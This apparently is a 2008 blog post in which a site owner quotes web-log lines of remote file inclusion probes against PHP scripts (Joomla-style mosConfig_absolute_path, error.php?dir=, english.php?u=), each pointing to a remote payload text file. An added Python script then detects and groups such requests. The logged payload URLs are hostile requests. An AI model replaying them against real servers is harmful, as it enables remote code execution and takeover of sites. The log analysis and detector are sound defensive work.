2008-08-26
Browsing through the web logs looking for any problems shows heaps of IPs trying to find vulnerable PHP scripts to break into using an approach of constructing lots of URLs with the vulnerable script and the right parameters at the end. Sometimes scans from one IP mingle with scans from another IP. Samples:

    193.207.106.54 - - [26/Aug/2008:13:18:39 +0200] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 200 3155 "-" "libwww-perl/5.79"
    193.207.106.54 - - [26/Aug/2008:13:18:39 +0200] "GET /~koos/newstag.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
    193.207.106.54 - - [26/Aug/2008:13:18:40 +0200] "GET /~koos/newstag.cgi/security//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ganzkoerperpflege.at/files/oye.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
    74.55.98.10 - - [26/Aug/2008:15:53:50 +0200] "GET /~koos/newsitem.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.813"
    74.55.98.10 - - [26/Aug/2008:15:53:51 +0200] "GET /~koos/newsitem.cgi//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.813"
    74.55.98.10 - - [26/Aug/2008:15:53:51 +0200] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://visitingphysicians.com/hrjobs_contacts/r.txt?? HTTP/1.1" 200 3155 "-" "libwww-perl/5.813"
    193.142.215.12 - - [26/Aug/2008:21:46:07 +0200] "GET /~koos/error.php?dir=http:/www.starthost.us/pemlk/darl/safe.txt?? HTTP/1.1" 404 901 "-" "libwww-perl/5.808"

The one that puzzles me because I see a lot of it and can't find the associated vulnerability:

    62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /~koos/newstag.cgi/spam/english.php?u=http://javva.com/id.txt? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"
    62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /english.php?u=http://javva.com/id.txt? HTTP/1.1" 404 901 "-" "libwww-perl/5.79"
    62.40.154.234 - - [26/Aug/2008:10:47:56 +0200] "GET /~koos/newstag.cgi/english.php?u=http://javva.com/id.txt? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"

Not an advertisement for PHP, this.
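An added example, not part of the original post: a Python filter that picks requests like the ones above out of an Apache combined-format log (any query parameter whose value is itself a URL), groups them by source IP, and lists the probes that were answered with a 2xx status. The sample lines, IP addresses and domains are constructed, and the function names are this example's own.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Apache combined log format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>.*) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)
# Probe signature: a query parameter whose value is itself a URL.
# ":/+" also accepts a single slash, as in "http:/host/...".
REMOTE_VALUE_RE = re.compile(
    r'[?&](?P<param>[^=&]+)=(?P<url>(?:https?|ftp):/+[^&\s]*)', re.IGNORECASE
)

# Constructed sample lines (documentation IP ranges and example domains).
SAMPLE = [
    '192.0.2.10 - - [26/Aug/2008:13:18:39 +0200] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&GLOBALS=&mosConfig_absolute_path=http://files.example.net/a.txt?? HTTP/1.1" 200 3155 "-" "libwww-perl/5.79"',
    '192.0.2.10 - - [26/Aug/2008:13:18:40 +0200] "GET /app/index.php?mosConfig_absolute_path=http://files.example.net/a.txt?? HTTP/1.1" 404 5 "-" "libwww-perl/5.79"',
    '198.51.100.7 - - [26/Aug/2008:21:46:07 +0200] "GET /error.php?dir=http:/files.example.org/b.txt?? HTTP/1.1" 404 901 "-" "libwww-perl/5.808"',
    '203.0.113.5 - - [26/Aug/2008:22:00:00 +0200] "GET /index.html?ref=newsletter HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

def find_rfi_probes(lines):
    """Group requests carrying a URL-valued parameter by source IP."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line
        target = unquote(m["target"])  # also catches http%3A%2F%2F...
        for p in REMOTE_VALUE_RE.finditer(target):
            hits[m["ip"]].append({
                "param": p["param"],
                "url": p["url"].rstrip("?"),  # the probes end in padding "?"
                "status": int(m["status"]),
                "agent": m["agent"],
            })
    return dict(hits)

def answered_ok(hits):
    """Probes that got a 2xx: the path resolved, so check what was served."""
    return [(ip, h["param"]) for ip, probes in hits.items()
            for h in probes if 200 <= h["status"] < 300]

if __name__ == "__main__":
    found = find_rfi_probes(SAMPLE)
    for ip, probes in found.items():
        print(ip, sorted({p["agent"] for p in probes}), len(probes), "probes")
    print("review:", answered_ok(found))
```

A 2xx here only means the server returned a page for that path, as with the `//index.php` requests above that got `200 3155`; it marks which responses to inspect, not a confirmed inclusion.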